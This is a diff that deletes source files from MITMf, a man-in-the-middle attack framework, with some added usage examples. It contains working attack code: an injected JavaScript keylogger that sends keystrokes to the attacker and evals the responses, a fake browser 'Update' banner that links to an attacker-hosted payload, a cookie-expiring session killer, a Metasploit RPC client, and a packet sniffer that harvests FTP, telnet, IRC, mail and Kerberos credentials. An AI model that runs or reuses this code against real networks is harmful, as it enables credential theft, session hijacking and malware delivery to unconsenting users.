# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import pyinotify
import threading
from configobj import ConfigObj
class ConfigWatcher(pyinotify.ProcessEvent, object):
@property
def config(self):
return ConfigObj("./config/mitmf.conf")
def process_IN_MODIFY(self, event):
self.on_config_change()
def start_config_watch(self):
wm = pyinotify.WatchManager()
wm.add_watch('./config/mitmf.conf', pyinotify.IN_MODIFY)
notifier = pyinotify.Notifier(wm, self)
t = threading.Thread(name='ConfigWatcher', target=notifier.loop)
t.setDaemon(True)
t.start()
def on_config_change(self):
""" We can subclass this function to do stuff after the config file has been modified"""
pass
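A minimal sketch of how a component would use this class, assuming it subclasses ConfigWatcher and overrides on_config_change() (the ExamplePlugin name and the config key it re-reads are illustrative only):
class ExamplePlugin(ConfigWatcher):

    def initialize(self):
        # start watching ./config/mitmf.conf for IN_MODIFY events in a daemon thread
        self.start_config_watch()

    def on_config_change(self):
        # re-read whatever section this component cares about
        print "config reloaded, API port is now {}".format(self.config['MITMf']['MITMf-API']['port'])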

View file

@ -1,103 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import string
class CookieCleaner:
'''This class cleans cookies we haven't seen before. The basic idea is to
kill sessions, which isn't entirely straight-forward. Since we want this to
be generalized, there's no way for us to know exactly what cookie we're trying
to kill, which also means we don't know what domain or path it has been set for.
The rule with cookies is that specific overrides general. So cookies that are
set for mail.foo.com override cookies with the same name that are set for .foo.com,
just as cookies that are set for foo.com/mail override cookies with the same name
that are set for foo.com/
The best we can do is guess, so we just try to cover our bases by expiring cookies
in a few different ways. The most obvious thing to do is look for individual cookies
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
set by JavaScript instead of a Set-Cookie header, and if we block those the site
will think cookies are disabled in the browser. So we do the expirations and whitelisting
based on client,server tuples. The first time a client hits a server, we kill whatever
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
'''
_instance = None
def __init__(self):
self.cleanedCookies = set();
self.enabled = False
@staticmethod
def getInstance():
if CookieCleaner._instance == None:
CookieCleaner._instance = CookieCleaner()
return CookieCleaner._instance
def setEnabled(self, enabled):
self.enabled = enabled
def isClean(self, method, client, host, headers):
if method == "POST": return True
if not self.enabled: return True
if not self.hasCookies(headers): return True
return (client, self.getDomainFor(host)) in self.cleanedCookies
def getExpireHeaders(self, method, client, host, headers, path):
domain = self.getDomainFor(host)
self.cleanedCookies.add((client, domain))
expireHeaders = []
for cookie in headers['cookie'].split(";"):
cookie = cookie.split("=")[0].strip()
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
expireHeaders.extend(expireHeadersForCookie)
return expireHeaders
def hasCookies(self, headers):
return 'cookie' in headers
def getDomainFor(self, host):
hostParts = host.split(".")
return "." + hostParts[-2] + "." + hostParts[-1]
def getExpireCookieStringFor(self, cookie, host, domain, path):
pathList = path.split("/")
expireStrings = list()
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
if len(pathList) > 2:
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
return expireStrings
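To make the expiry strategy from the docstring concrete, a rough sketch of the first request seen from a (client, server) pair; the addresses, host and cookie names are invented:
cleaner = CookieCleaner.getInstance()
cleaner.setEnabled(True)

headers = {'cookie': 'sid=abc123; theme=dark'}
if not cleaner.isClean('GET', '10.0.0.5', 'mail.foo.com', headers):
    for expire in cleaner.getExpireHeaders('GET', '10.0.0.5', 'mail.foo.com', headers, '/mail/inbox'):
        print expire.strip()
# Emits EXPIRED Set-Cookie values for every cookie name against both ".foo.com" and
# "mail.foo.com" (plus "/mail"-scoped variants); later requests from 10.0.0.5 to that
# domain are considered clean and left alone.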

View file

@ -1,45 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
class DnsCache:
'''
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
'''
_instance = None
def __init__(self):
self.customAddress = None
self.cache = {}
@staticmethod
def getInstance():
if DnsCache._instance == None:
DnsCache._instance = DnsCache()
return DnsCache._instance
def cacheResolution(self, host, address):
self.cache[host] = address
def getCachedAddress(self, host):
if host in self.cache:
return self.cache[host]
return None
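A quick usage sketch of the singleton (hostname and address are arbitrary):
cache = DnsCache.getInstance()
if cache.getCachedAddress('example.org') is None:
    cache.cacheResolution('example.org', '93.184.216.34')
print cache.getCachedAddress('example.org')    # -> 93.184.216.34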

View file

@ -1,24 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest
class FerretProxy(HTTPChannel):
requestFactory = ClientRequest

View file

@ -1,71 +0,0 @@
<script>
var newHTML = document.createElement('div');
newHTML.innerHTML = ' \
<style type="text/css"> \
\
#headerupdate { \
display:none; \
position: fixed !important; \
top: 0 !important; \
left: 0 !important; \
z-index: 2000 !important; \
width: 100% !important; \
height: 40px !important; \
overflow: hidden !important; \
font-size: 14px !important; \
color: black !important; \
font-weight: normal !important; \
background-color:#F0F0F0 !important; \
border-bottom: 1px solid #A0A0A0 !important; \
\
} \
\
#headerupdate h1 { \
float: left !important; \
margin-left: 2px !important; \
margin-top: 14px !important; \
padding-left: 30px !important; \
font-weight:normal !important; \
font-size: 13px !important; \
\
background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABsAAAAOCAYAAADez2d9AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAACnSURBVDhP5ZRNCgMhDIWj6ELwFt7JE3gkT+GRPIVLwZ8Wpy4KNXFm6KLQDx4qgbwkoiyl9AAE7z0opUBrDaUUyDmDc24bw+BzXVJrnbsX72cqhkF2FmMEKSUIIaD3fiQ0xmxjGKhZCOFIcgXOOVhr5+kTdIyj0mF2RbtRomattVuiQM1WlZ8RxW90tkp0RhR/aLa6/DOiQM0YY8tklMajpiC/q+8C8AS167V3qBALWwAAAABJRU5ErkJggg==") no-repeat left top !important; \
} \
\
#headerupdate ul { \
padding: 0 !important; \
text-align: right !important; \
} \
\
#headerupdate li { \
display: inline-block !important; \
margin: 0px 15px !important; \
text-align: left !important; \
} \
\
</style> \
<div id="headerupdate"> \
<h1> \
<strong> \
_TEXT_GOES_HERE_ \
</strong> \
</h1> \
\
<ul> \
\
<li> \
<a target="_blank" href="http://_IP_GOES_HERE_/_PAYLOAD_GOES_HERE_"> \
<button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;"> \
Update \
</button> \
\
</a> \
</li> \
</ul> \
</div> \
';
document.body.appendChild(newHTML);
document.getElementById("headerupdate").style.display = "block";
</script>

View file

@ -1,117 +0,0 @@
window.onload = function (){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener){
//console.log("first");
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
}
else if (window.attachEvent){
//console.log("second");
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
}
else {
//console.log("third");
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 0)
{
var3 = e.charCode
}
if (var3 != "d" && var3 != 8 && var3 != 9 && var3 != 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
}
function function1(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
else if (var3 == 0)
{
text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(encodeURIComponent(text), srcname);
}
}
}
function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}
var2= var2 + key + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=utf-8");
xhr.send(var2 + '&&' + inputName);
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load diff

View file

@ -1,46 +0,0 @@
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
class logger:
log_level = None
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'):
fileHandler = logging.FileHandler(logfile)
fileHandler.setFormatter(formatter)
streamHandler = logging.StreamHandler(sys.stdout)
streamHandler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.propagate = False
logger.addHandler(streamHandler)
logger.addHandler(fileHandler)
logger.setLevel(self.log_level)
return logger
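A minimal usage sketch, assuming log_level has been set beforehand and ./logs/ exists (the "Demo" tag is made up; real callers pass their plugin name):
import logging

logger.log_level = logging.DEBUG
formatter = logging.Formatter("%(asctime)s [Demo] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Demo", formatter)
log.info("goes to stdout and to ./logs/mitmf.log")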

View file

@ -1,100 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
"""
Originally coded by @xtr4nge
"""
#import multiprocessing
import threading
import logging
import json
import sys
from flask import Flask
from core.configwatcher import ConfigWatcher
from core.proxyplugins import ProxyPlugins
app = Flask(__name__)
class mitmfapi(ConfigWatcher):
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
self.host = self.config['MITMf']['MITMf-API']['host']
self.port = int(self.config['MITMf']['MITMf-API']['port'])
@app.route("/")
def getPlugins():
# example: http://127.0.0.1:9999/
pdict = {}
#print ProxyPlugins().plugin_list
for activated_plugin in ProxyPlugins().plugin_list:
pdict[activated_plugin.name] = True
#print ProxyPlugins().all_plugins
for plugin in ProxyPlugins().all_plugins:
if plugin.name not in pdict:
pdict[plugin.name] = False
#print ProxyPlugins().pmthds
return json.dumps(pdict)
@app.route("/<plugin>")
def getPluginStatus(plugin):
# example: http://127.0.0.1:9090/cachekill
for p in ProxyPlugins().plugin_list:
if plugin == p.name:
return json.dumps("1")
return json.dumps("0")
@app.route("/<plugin>/<status>")
def setPluginStatus(plugin, status):
# example: http://127.0.0.1:9090/cachekill/1 # enabled
# example: http://127.0.0.1:9090/cachekill/0 # disabled
if status == "1":
for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0":
for p in ProxyPlugins().plugin_list:
if p.name == plugin:
ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"})
def startFlask(self):
app.run(debug=False, host=self.host, port=self.port)
#def start(self):
# api_thread = multiprocessing.Process(name="mitmfapi", target=self.startFlask)
# api_thread.daemon = True
# api_thread.start()
def start(self):
api_thread = threading.Thread(name='mitmfapi', target=self.startFlask)
api_thread.setDaemon(True)
api_thread.start()
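The three routes boil down to plain GET requests; a hedged sketch of driving them with requests, assuming the default host/port from the [MITMf][MITMf-API] config section and reusing the cachekill example from the comments above:
import requests

base = "http://127.0.0.1:9999"
print requests.get(base + "/").json()              # JSON map of plugin name -> enabled?
print requests.get(base + "/cachekill").json()     # "1" if active, "0" otherwise
print requests.get(base + "/cachekill/1").json()   # activate it
print requests.get(base + "/cachekill/0").json()   # disable it again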

View file

@ -1,159 +0,0 @@
#! /usr/bin/env python2.7
# MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
# Copyright (c) 2014-2016 Ryan Linn - RLinn@trustwave.com, Marcello Salvati - byt3bl33d3r@gmail.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import msgpack
import logging
import requests
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
class Msfrpc:
class MsfError(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MsfAuthError(MsfError):
def __init__(self,msg):
self.msg = msg
def __init__(self, opts={}):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "55552"
self.uri = opts.get('uri') or "/api/"
self.ssl = opts.get('ssl') or False
self.token = None
self.headers = {"Content-type" : "binary/message-pack"}
def encode(self, data):
return msgpack.packb(data)
def decode(self, data):
return msgpack.unpackb(data)
def call(self, method, opts=[]):
if method != 'auth.login':
if self.token == None:
raise self.MsfAuthError("MsfRPC: Not Authenticated")
if method != "auth.login":
opts.insert(0, self.token)
if self.ssl == True:
url = "https://%s:%s%s" % (self.host, self.port, self.uri)
else:
url = "http://%s:%s%s" % (self.host, self.port, self.uri)
opts.insert(0, method)
payload = self.encode(opts)
r = requests.post(url, data=payload, headers=self.headers)
opts[:] = [] #Clear opts list
return self.decode(r.content)
def login(self, user, password):
auth = self.call("auth.login", [user, password])
try:
if auth['result'] == 'success':
self.token = auth['token']
return True
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
class Msf(ConfigWatcher):
'''
This is just a wrapper around the Msfrpc class,
avoids a lot of code duplication throughout the framework
'''
def __init__(self):
try:
self.msf = Msfrpc({"host": self.config['MITMf']['Metasploit']['rpcip'],
"port": self.config['MITMf']['Metasploit']['rpcport']})
self.msf.login('msf', self.config['MITMf']['Metasploit']['rpcpass'])
except Exception as e:
shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e))
@property
def version(self):
return self.msf.call('core.version')['version']
def jobs(self):
return self.msf.call('job.list')
def jobinfo(self, pid):
return self.msf.call('job.info', [pid])
def killjob(self, pid):
return self.msf.call('job.kill', [pid])
def findjobs(self, name):
jobs = self.jobs()
pids = []
for pid, jobname in jobs.iteritems():
if name in jobname:
pids.append(pid)
return pids
def sessions(self):
return self.msf.call('session.list')
def sessionsfrompeer(self, peer):
sessions = self.sessions()
for n, v in sessions.iteritems():
if peer in v['tunnel_peer']:
return n
return None
def sendcommand(self, cmd):
#Create a virtual console
console_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [console_id, cmd])
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options
client = Msfrpc({})
# Log in to the msgrpc server using the password "abc123"
client.login('msf','abc123')
# Get a list of the exploits from the server
mod = client.call('module.exploits')
# Grab the first item from the modules value of the returned dict
print "Compatible payloads for : %s\n" % mod['modules'][0]
# Get the list of compatible payloads for the first option
ret = client.call('module.compatible_payloads',[mod['modules'][0]])
for i in (ret.get('payloads')):
print "\t%s" % i

View file

@ -1,929 +0,0 @@
import logging
import binascii
import struct
import base64
import threading
import binascii
from core.logger import logger
from os import geteuid, devnull
from sys import exit
from urllib import unquote
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from urllib import unquote
from scapy.all import *
conf.verb=0
formatter = logging.Formatter("%(asctime)s [NetCreds] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("NetCreds", formatter)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
parsing_pcap = False
class NetCreds:
version = "1.0"
def sniffer(self, interface, ip):
try:
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
except Exception as e:
if "Interrupted system call" in e: pass
def start(self, interface, ip):
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def parse_pcap(self, pcap):
global parsing_pcap
parsing_pcap = True
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep each load under 5,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
